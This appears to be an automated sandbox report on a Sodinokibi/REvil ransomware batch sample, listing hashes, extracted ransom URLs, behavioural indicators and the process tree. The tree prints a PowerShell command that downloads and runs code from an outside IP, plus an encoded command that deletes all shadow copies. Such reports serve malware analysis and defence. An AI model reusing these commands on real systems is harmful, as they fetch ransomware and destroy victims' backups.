Analysis
-
max time kernel
42s -
max time network
51s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
19-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
6b344dbcf15e9fffe23ce5307af78070.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
6b344dbcf15e9fffe23ce5307af78070.bat
Resource
win10
General
-
Target
6b344dbcf15e9fffe23ce5307af78070.bat
-
Size
215B
-
MD5
edcaf035412a5f6b004822eeba9ec0bc
-
SHA1
5b65ca011d951eaa8266950415eb13dc55766d40
-
SHA256
a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383
-
SHA512
10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02
Malware Config
Extracted
http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070
Extracted
C:\7h6tcv2-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1481311B8AFEB78D
http://decryptor.cc/1481311B8AFEB78D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1500 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\isrmgc0.bmp" powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\v3.5\7h6tcv2-readme.txt powershell.exe File created \??\c:\program files (x86)\7h6tcv2-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertRead.ppt powershell.exe File opened for modification \??\c:\program files\CheckpointDismount.rmi powershell.exe File opened for modification \??\c:\program files\ConnectFormat.M2T powershell.exe File created \??\c:\program files\microsoft sql server compact edition\7h6tcv2-readme.txt powershell.exe File opened for modification \??\c:\program files\SendCompress.jpe powershell.exe File opened for modification \??\c:\program files\UnprotectConnect.wdp powershell.exe File opened for modification \??\c:\program files\CloseRegister.TTS powershell.exe File opened for modification \??\c:\program files\EditRepair.xltm powershell.exe File opened for modification \??\c:\program files\FindRegister.AAC powershell.exe File opened for modification \??\c:\program files\RedoHide.xht powershell.exe File opened for modification \??\c:\program files\SplitRemove.sql powershell.exe File opened for modification \??\c:\program files\UseCompress.mpp powershell.exe File created \??\c:\program files\7h6tcv2-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseSwitch.mp4v powershell.exe File opened for modification \??\c:\program files\FormatProtect.php powershell.exe File opened for modification \??\c:\program files\InvokeInstall.xla powershell.exe File opened for modification \??\c:\program files\PopInstall.rmi powershell.exe File opened for modification \??\c:\program files\ResetSwitch.xltm powershell.exe File opened for modification \??\c:\program files\ShowPop.vsd powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7h6tcv2-readme.txt powershell.exe File opened for modification \??\c:\program files\DisconnectPing.WTV powershell.exe File opened for modification \??\c:\program files\OutConvertTo.aifc powershell.exe File opened for modification \??\c:\program files\RemoveBlock.contact powershell.exe File opened for modification \??\c:\program files\ResetGroup.wma powershell.exe File opened for modification \??\c:\program files\StopAdd.mp3 powershell.exe File opened for modification \??\c:\program files\TraceCheckpoint.3gp powershell.exe File opened for modification \??\c:\program files\UndoOptimize.gif powershell.exe File opened for modification \??\c:\program files\AddNew.pub powershell.exe File opened for modification \??\c:\program files\CopyCheckpoint.7z powershell.exe File opened for modification \??\c:\program files\MergeStart.asx powershell.exe File opened for modification \??\c:\program files\SuspendInvoke.asf powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1500 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1820 powershell.exe 1820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeBackupPrivilege 1576 vssvc.exe Token: SeRestorePrivilege 1576 vssvc.exe Token: SeAuditPrivilege 1576 vssvc.exe Token: SeTakeOwnershipPrivilege 1500 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1412 wrote to memory of 1500 1412 cmd.exe powershell.exe PID 1412 wrote to memory of 1500 1412 cmd.exe powershell.exe PID 1412 wrote to memory of 1500 1412 cmd.exe powershell.exe PID 1412 wrote to memory of 1500 1412 cmd.exe powershell.exe PID 1500 wrote to memory of 1820 1500 powershell.exe powershell.exe PID 1500 wrote to memory of 1820 1500 powershell.exe powershell.exe PID 1500 wrote to memory of 1820 1500 powershell.exe powershell.exe PID 1500 wrote to memory of 1820 1500 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1576